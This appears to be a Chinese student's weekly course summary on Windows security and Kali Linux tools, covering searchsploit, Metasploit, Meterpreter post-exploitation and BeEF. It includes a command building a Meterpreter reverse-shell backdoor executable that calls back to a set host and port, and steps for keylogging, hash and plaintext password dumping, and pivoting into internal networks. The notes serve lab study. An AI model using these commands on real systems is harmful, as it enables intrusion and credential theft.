第七周总结

教材学习总结

Windows 系统架构:Windows 系统架构包括操做系统内核,以及用户代码空间。
操做系统内核模块:操做系统内核模块包括:Windows 执行体、Windows 内核体、设备驱动程序、硬件抽象层、Windows 窗口与图形界面接口内核实现代码
用户代码模块:用户代码模块包括:系统支持进程、环境子系统服务进程、服务进程、用户应用软件、核心子系统DLL
Windows 下的核心机制:Windows 进程和线程管理机制; Windows 内存管理机制;Windows 文件管理机制;Windows 注册表管理机制;Windows 的网络机制。
Windows 操做系统的安全架构和机制:基于引用监控器模型来实现基本的对象安全模型。
Windows 的安全机制:Windows 身份认证机制;Windows 受权与访问控制机制、Windows 安全审计机制、Windows 安全中心、其余安全机制。
Windows 身份认证机制:以安全主体概念来包含全部进行系统资源访问请求的实体对象,有用户、用户组和计算机三大类。
Windows 安全攻防技术:分为远程安全攻防技术和本地安全攻防技术。
Windows 远程攻击技术:远程口令猜想与破解攻击;攻击Windows网络服务;攻击Windows客户端及用户。
端口:远程桌面终端服务运行于TCP 3389端口;Windows 操做系统默认开放的13五、13七、13八、13九、445端口所提供的网络及本地服务是黑客攻击主要目标。
针对Windows 本地的攻击:Windows 本地特权提高;Windows 敏感信息窃取;Windows 消踪灭迹(删除掩盖入侵痕迹); Windows 远程控制与后门程序(实现对被入侵主机的持久控制)。html

视频学习总结

26.kali-漏洞利用之检索与利用

kali下的漏洞分析工具集以下图

一、searchsploit能够方便地借助关键词搜索漏洞信息以及漏洞对应的exp,例:searchsploit wordpress

查看exp

2.将网络常见漏洞作成一个网络漏洞利用集

ikat自动化开启不一样的exp。等待目标访问中招。


termineter旨在评估智能电表的安全性linux

27.kali-漏洞利用之Metasploit基础

了解kali linux下漏洞利用工具集中Metasploit攻击框架的基本使用
1.启动服务:在Kali中使用Metasploit,须要先开启PostgreSQL数据库服务和metasploit服务,而后就能够利用msf数据库查询exploit和记录。


2.路径介绍:Kali中msf的路径为/usr/share/metasploit-framework




3.基本命令

打开msf


4.测试示例:发现漏洞,搜索exploit


在这一步骤中并未发现匹配项sql

28.kali-漏洞利用之Meterprete介绍

了解kali linux下漏洞利用工具集中Metasploit的Meterprete模块

针对windows操做系统,反向链接shell,使用起来比较稳定
1.生成Meterpreter后门:msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.30.130 LPORT=2333 R | msfencode -t exe -c 5 > /root/door.exe
2.打开MSF,开启监听 选择exploit/multi/handler
3.在目标机器上执行door.exe
四、经过help命令查看可执行的命令
五、常见命令使用,包括系统信息,抓取屏幕截图与抓取HASH等。
六、目录浏览
七、键盘监听
八、扩展工具,load/use以后再输入help,就能够了看到有关这个模块的命令的说明了
九、扩展工具之Minikatz,抓取本地密码明文





shell

29.kali-漏洞利用之Metasploit后渗透测试

在跳板获取必定权限后须要积极地向内网主机权限发展,获取指定的目标信息,探查系统漏洞,借助msf已经获得的Meterpreter后门,可使系列的操做更容易。
一、查看当前网卡、网段信息。ifconfig
二、添加路由表
run autoroute -s 10.0.0.1
可使用msf中的模块跨网段攻击或扫描。可经过脚本autoroute快速添加。
三、开socket代理,经过使用auxiliary/server/socks4a模块,建立一个socks代理,能够为浏览器,sqlmap,nmap使用。经过代理便可访问内网计算机。
四、经过background和session -i能够自由切换进入session。
五、输入run能够看到在meterpreter上能够作的不少命令。
六、经过run post/能够看到后渗透测试模块
七、获取内网信息 run arp_acanner -h
八、也能够上传文件,作端口转发后进行后续测试。数据库

30.kali-漏洞利用之BeEF

了解kali linux下漏洞利用工具集中BeeF工具的使用,BeeF是一款专一于浏览器端的渗透测试工具
1.命令行下启动BeeFbeef-xss



二、假设被测试主机因为XSS漏洞请求到http://127.0.0.1:3000/demos/basic.html页面





执行成功后出现以下效果图:

五、Proxy功能:选中目标主机,点右键,在菜单中选中Use as Proxy;而后在Rider选项卡中的Forge Request编辑并发送想要发送的内容。




六、BeEF默认是不加载Metasploit的,若是要使用Metasploit丰富的攻击模块,须要作些配置.


保证此处IP等信息设置正确(不适用127.0.0.1,需使用本机IP),并修改Custom路径:

配置好后打开msfconsole,运行命令:load msgrpc ServerHost=192.168.30.1 Pass=abc123

执行./beef -x

这时从新加载Metasploit的exploit模块

重启beef服务:service beef-xss restart

此时再访问beef以前的页面.发现Metasploit下多了许多模块:
windows

相关文章
相关标签/搜索